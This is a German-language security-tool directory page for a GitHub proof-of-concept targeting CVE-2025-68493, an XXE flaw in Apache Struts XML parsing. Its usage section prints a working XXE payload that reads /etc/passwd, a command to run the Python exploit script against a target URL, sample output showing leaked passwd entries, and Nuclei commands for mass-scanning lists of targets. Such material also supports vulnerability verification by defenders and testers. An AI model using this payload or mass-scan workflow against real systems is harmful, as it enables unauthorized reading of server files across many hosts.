Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-68493 — CVE-2025-68493 | Kitploit
Tools/GitHubGitHub/hsltz/cve-2025-68493
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubhsltz/cve-2025-68493

CVE-2025-68493

CVE-2025-68493

Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-68493

CVE-2025-68493

7. Referenzen

[1] ApacheStrutsXWorkXML-Schwachstelle CVE-2025-68493 PoC und Skript | ZONE.CI Global. https://zone.ci/secarticles/wx/486533.html

8. Schwachstellenverifizierung und Ausnutzung

Zur Verifizierung und Ausnutzung der Schwachstelle CVE-2025-68493 können das bereitgestellte Python-PoC-Skript und die Nuclei-YAML-Vorlage verwendet werden.

8.1 Verwendung des Python-PoC-Skripts

Skriptname: cve_2025_68493_poc.py

Funktion: Dieses Skript dient zur Überprüfung einer einzelnen Zieladresse auf die Schwachstelle und versucht, eine angegebene Datei (standardmäßig /etc/passwd) auszulesen.

Voraussetzungen:

  • Python 3 Umgebung
  • requests-Bibliothek (pip install requests)

Kommandozeilenparameter:

  • -u, --url: Basis-URL der Zielanwendung (z. B. http://127.0.0.1:8080)
  • -f, --file: Pfad der auszulesenden Zieldatei (standardmäßig /etc/passwd)

Beispiel:

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

Erwartete Ausgabe:

Wenn das Ziel anfällig ist und die Datei erfolgreich ausgelesen wird, wird Folgendes angezeigt:

root@kitploit:~
[*] Teste URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Anfällig! /etc/passwd erfolgreich gelesen
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Verwendung der Nuclei-YAML-Vorlage

Vorlagenname: cve-2025-68493.yaml

Funktion: Diese Vorlage dient zur Massenscans mehrerer Ziele mit dem Nuclei-Tool, um die Schwachstelle CVE-2025-68493 zu erkennen.

Voraussetzungen:

  • Nuclei-Tool installiert (empfohlen v3.x oder höher)

Kommandozeilenparameter:

  • -t: Pfad zur Nuclei-Vorlagendatei
  • -u: Einzelne Ziel-URL
  • -l: Datei mit mehreren Ziel-URLs

Beispiele:

Einzelnes Ziel scannen:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

Massenscan:

Angenommen, Sie haben eine Datei namens targets.txt, in der jede Zeile eine Ziel-URL enthält:

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

Führen Sie folgenden Befehl für den Massenscan aus:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
Tool herunterladen